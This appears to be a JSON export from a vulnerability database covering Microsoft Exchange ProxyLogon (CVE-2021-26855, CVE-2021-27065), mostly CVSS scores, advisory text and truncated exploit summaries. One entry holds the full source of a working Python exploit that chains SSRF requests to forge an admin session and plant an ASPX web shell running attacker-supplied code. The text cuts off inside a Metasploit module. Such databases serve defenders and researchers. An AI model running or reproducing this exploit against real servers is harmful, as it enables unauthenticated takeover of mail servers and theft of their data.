"NONE"}, "impactScore": 5.9}, "published": "2021-03-03T00:11:09", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-07-27T21:19:37", "id": "256984DC-A742-53F8-889F-2071EC134734", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-20T23:32:16", "description": "# CVE-2021-26855-SSRF-Poc\nThis script helps to identify CVE-202...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-06T19:03:00", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2022-07-20T17:22:39", "id": "C87EF7D4-0E85-54CD-9D5A-381C451E5511", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-09T16:56:27", "description": "# Microsoft_Exchange_Server_SSRF_CVE-2021-26855\n\n**zoomeye dork\uff1a...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-06T09:15:55", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2022-08-09T05:55:45", "id": "7F4F3321-8955-51B4-B195-7C1F647A6C84", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-14T14:30:56", "description": "# CVE-2021-26855_Exchange RCE\n\n> **\u672c\u6587\u4ee5\u53ca\u5de5\u5177...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-18T00:44:29", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": 
false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2022-08-14T07:03:16", "id": "71E27C48-EAFE-5FC0-98A4-BE7276D47449", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T08:59:28", "description": "# SharpProxyLogon\n\nC# POC for the ProxyLogon chained RCE\n\n```\n _...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-29T21:10:34", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2022-07-27T12:36:24", "id": "18D647E9-D7D4-5591-B16C-05D007AFD726", "href": "", "cvss": {"score": 7.5, "vector": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-14T13:06:24", "description": "# CVE-2021-26855\nPoC of proxylogon chain SSRF(CVE-2021-26855) to...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-11T20:51:48", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2022-07-14T10:32:08", "id": "0DE16A64-9ACA-5BBE-A315-A3AE1B013900", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:19:57", "description": "Disclaimer: All the information provided in this repository is f...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, 
"published": "2021-03-16T10:14:56", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26857", "CVE-2021-26855"], "modified": "2021-03-24T16:54:40", "id": "7275794A-F2F6-51E6-B514-185E494D8A3F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-15T15:36:14", "description": "# CVE-2021-26855_SSRF\nCVE-2021-26855 Exchange ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-08T07:28:21", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 
6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26857", "CVE-2021-26855", "CVE-2021-26865", "CVE-2021-26858"], "modified": "2021-12-15T14:41:36", "id": "35B21CE7-1E51-5824-B70E-36480A6E8763", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-12T13:06:47", "description": "# HAFNIUM-IOC\nHafnium-IOC is a simple PowerShell script that run...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-03T17:36:18", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26858", "CVE-2021-26857", "CVE-2021-26865"], "modified": "2022-01-12T11:59:39", "id": "72EF4B3F-6CF3-5E4D-9B05-D4E27A7A9D1A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:35:14", "description": "A remote code execution vulnerability exists in Microsoft Exchange. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-02T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Exchange Server Remote Code Execution (CVE-2021-26855; CVE-2021-27065)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2021-03-11T00:00:00", "id": "CPAI-2021-0099", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:35:14", "description": "A remote code execution vulnerability exists in VMware View Planner. The vulnerability is due to improper validation of HTTP request to logupload endpoint. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-14T00:00:00", "type": "checkpoint_advisories", "title": "VMware View Planner Remote Code Execution (CVE-2021-21978)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21978"], "modified": "2021-03-14T00:00:00", "id": "CPAI-2021-0148", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-09-22T06:55:42", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-11T00:00:00", "type": "zdt", "title": "Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon) 
Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26855"], "modified": "2021-03-11T00:00:00", "id": "1337DAY-ID-35944", "href": "https://0day.today/exploit/description/35944", "sourceData": "# Exploit Title: Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon)\r\n# Date: 2021-03-10\r\n# Exploit Author: testanull\r\n# Vendor Homepage: https://www.microsoft.com\r\n# Version: MS Exchange Server 2013, 2016, 2019\r\n# CVE: 2021-26855, 2021-27065\r\n\r\nimport requests\r\nfrom urllib3.exceptions import InsecureRequestWarning\r\nimport random\r\nimport string\r\nimport sys\r\n\r\n\r\ndef id_generator(size=6, chars=string.ascii_lowercase + string.digits):\r\n return ''.join(random.choice(chars) for _ in range(size))\r\n\r\nif len(sys.argv) < 2:\r\n\tprint(\"Usage: python PoC.py <target> <email>\")\r\n\tprint(\"Example: python PoC.py mail.evil.corp [email\u00a0protected]\")\r\n\texit()\r\nrequests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)\r\ntarget = sys.argv[1]\r\nemail = sys.argv[2]\r\nrandom_name = id_generator(3) + \".js\"\r\nuser_agent = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36\"\r\n\r\nshell_path = \"Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth\\\\ahihi.aspx\"\r\nshell_absolute_path = \"\\\\\\\\127.0.0.1\\\\c$\\\\%s\" % shell_path\r\n\r\nshell_content = '<script language=\"JScript\" 
runat=\"server\"> function Page_Load(){/**/eval(Request[\"exec_code\"],\"unsafe\");}</script>'\r\nlegacyDnPatchByte = \"68747470733a2f2f696d6775722e636f6d2f612f7a54646e5378670a0a0a0a0a0a0a0a\"\r\nautoDiscoverBody = \"\"\"<Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\">\r\n <Request>\r\n <EMailAddress>%s</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>\r\n </Request>\r\n</Autodiscover>\r\n\"\"\" % email\r\n\r\nprint(\"Attacking target \" + target)\r\nprint(\"=============================\")\r\nprint(legacyDnPatchByte.decode('hex'))\r\nFQDN = \"EXCHANGE\"\r\nct = requests.get(\"https://%s/ecp/%s\" % (target, random_name), headers={\"Cookie\": \"X-BEResource=localhost~1942062522\",\r\n \"User-Agent\": user_agent},\r\n verify=False)\r\nif \"X-CalculatedBETarget\" in ct.headers and \"X-FEServer\" in ct.headers:\r\n FQDN = ct.headers[\"X-FEServer\"]\r\n\r\nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={\r\n \"Cookie\": \"X-BEResource=%s/autodiscover/autodiscover.xml?a=~1942062522;\" % FQDN,\r\n \"Content-Type\": \"text/xml\",\r\n \"User-Agent\": user_agent},\r\n data=autoDiscoverBody,\r\n verify=False\r\n )\r\nif ct.status_code != 200:\r\n print(\"Autodiscover Error!\")\r\n exit()\r\nif \"<LegacyDN>\" not in ct.content:\r\n print(\"Can not get LegacyDN!\")\r\n exit()\r\n\r\nlegacyDn = ct.content.split(\"<LegacyDN>\")[1].split(\"</LegacyDN>\")[0]\r\nprint(\"Got DN: \" + legacyDn)\r\n\r\nmapi_body = legacyDn + \"\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\r\nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={\r\n \"Cookie\": \"[email\u00a0protected]%s:444/mapi/[email\u00a0protected]ab&a=~1942062522;\" % FQDN,\r\n \"Content-Type\": \"application/mapi-http\",\r\n \"User-Agent\": user_agent\r\n},\r\n 
data=mapi_body,\r\n verify=False\r\n )\r\nif ct.status_code != 200 or \"act as owner of a UserMailbox\" not in ct.content:\r\n print(\"Mapi Error!\")\r\n exit()\r\n\r\nsid = ct.content.split(\"with SID \")[1].split(\" and MasterAccountSid\")[0]\r\n\r\nprint(\"Got SID: \" + sid)\r\n\r\nproxyLogon_request = \"\"\"<r at=\"Negotiate\" ln=\"john\"><s>%s</s><s a=\"7\" t=\"1\">S-1-1-0</s><s a=\"7\" t=\"1\">S-1-5-2</s><s a=\"7\" t=\"1\">S-1-5-11</s><s a=\"7\" t=\"1\">S-1-5-15</s><s a=\"3221225479\" t=\"1\">S-1-5-5-0-6948923</s></r>\r\n\"\"\" % sid\r\n\r\nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={\r\n \"Cookie\": \"[email\u00a0protected]%s:444/ecp/proxyLogon.ecp?a=~1942062522;\" % FQDN,\r\n \"Content-Type\": \"text/xml\",\r\n \"User-Agent\": user_agent\r\n},\r\n data=proxyLogon_request,\r\n verify=False\r\n )\r\nif ct.status_code != 241 or not \"set-cookie\" in ct.headers:\r\n print(\"Proxylogon Error!\")\r\n exit()\r\n\r\nsess_id = ct.headers['set-cookie'].split(\"ASP.NET_SessionId=\")[1].split(\";\")[0]\r\n\r\nmsExchEcpCanary = ct.headers['set-cookie'].split(\"msExchEcpCanary=\")[1].split(\";\")[0]\r\nprint(\"Got session id: \" + sess_id)\r\nprint(\"Got canary: \" + msExchEcpCanary)\r\n\r\nct = requests.get(\"https://%s/ecp/%s\" % (target, random_name), headers={\r\n \"Cookie\": \"[email\u00a0protected]%s:444/ecp/about.aspx?a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % (\r\n FQDN, sess_id, msExchEcpCanary),\r\n \"User-Agent\": user_agent\r\n},\r\n verify=False\r\n )\r\nif ct.status_code != 200:\r\n print(\"Wrong canary!\")\r\n print(\"Sometime we can skip this ...\")\r\nrbacRole = ct.content.split(\"RBAC roles:</span> <span class='diagTxt'>\")[1].split(\"</span>\")[0]\r\n# print \"Got rbacRole: \"+ rbacRole\r\n\r\nprint(\"=========== It means good to go!!!====\")\r\n\r\nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={\r\n \"Cookie\": 
\"[email\u00a0protected]%s:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % (\r\n FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),\r\n \"Content-Type\": \"application/json; charset=utf-8\",\r\n \"User-Agent\": user_agent\r\n\r\n},\r\n json={\"filter\": {\r\n \"Parameters\": {\"__type\": \"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel\",\r\n \"SelectedView\": \"\", \"SelectedVDirType\": \"All\"}}, \"sort\": {}},\r\n verify=False\r\n )\r\nif ct.status_code != 200:\r\n print(\"GetOAB Error!\")\r\n exit()\r\noabId = ct.content.split('\"RawIdentity\":\"')[1].split('\"')[0]\r\nprint(\"Got OAB id: \" + oabId)\r\n\r\noab_json = {\"identity\": {\"__type\": \"Identity:ECP\", \"DisplayName\": \"OAB (Default Web Site)\", \"RawIdentity\": oabId},\r\n \"properties\": {\r\n \"Parameters\": {\"__type\": \"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel\",\r\n \"ExternalUrl\": \"http://ffff/#%s\" % shell_content}}}\r\n\r\nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={\r\n \"Cookie\": \"[email\u00a0protected]%s:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % (\r\n FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),\r\n \"Content-Type\": \"application/json; charset=utf-8\",\r\n \"User-Agent\": user_agent\r\n},\r\n json=oab_json,\r\n verify=False\r\n )\r\nif ct.status_code != 200:\r\n print(\"Set external url Error!\")\r\n exit()\r\n\r\nreset_oab_body = {\"identity\": {\"__type\": \"Identity:ECP\", \"DisplayName\": \"OAB (Default Web Site)\", \"RawIdentity\": oabId},\r\n \"properties\": {\r\n \"Parameters\": {\"__type\": \"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel\",\r\n \"FilePathName\": shell_absolute_path}}}\r\n\r\nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={\r\n 
\"Cookie\": \"[email\u00a0protected]%s:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % (\r\n FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),\r\n \"Content-Type\": \"application/json; charset=utf-8\",\r\n \"User-Agent\": user_agent\r\n},\r\n json=reset_oab_body,\r\n verify=False\r\n )\r\n\r\nif ct.status_code != 200:\r\n print(\"Write Shell Error!\")\r\n exit()\r\n\r\nprint(\"Successful!\")\n\n# 0day.today [2021-09-22] #", "sourceHref": "https://0day.today/exploit/35944", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-09T12:40:16", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-21T00:00:00", "type": "zdt", "title": "Microsoft Exchange 2019 - Unauthenticated Email Download Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26855"], "modified": "2021-05-21T00:00:00", "id": "1337DAY-ID-36281", "href": "https://0day.today/exploit/description/36281", "sourceData": "# Exploit Title: Microsoft Exchange 2019 - 
Unauthenticated Email Download (Metasploit)\n# Exploit Author: RAMELLA S\u00e9bastien\n# Vendor Homepage: https://microsoft.com\n# Version: This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012,\n Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,\n Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).\n# Tested on: Microsoft Windows 2012 R2 - Exchange 2016\n\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# begin auxiliary class\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Exchange ProxyLogon Collector',\n 'Description' => %q{\n This module scan for a vulnerability on Microsoft Exchange Server that\n allows an attacker bypassing the authentication and impersonating as the\n admin (CVE-2021-26855).\n\n By chaining this bug with another post-auth arbitrary-file-write\n vulnerability to get code execution (CVE-2021-27065).\n\n As a result, an unauthenticated attacker can execute arbitrary commands on\n Microsoft Exchange Server.\n\n This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012,\n Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,\n Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).\n\n All components are vulnerable by default.\n },\n 'Author' => [\n 'mekhalleh (RAMELLA S\u00e9bastien)' # 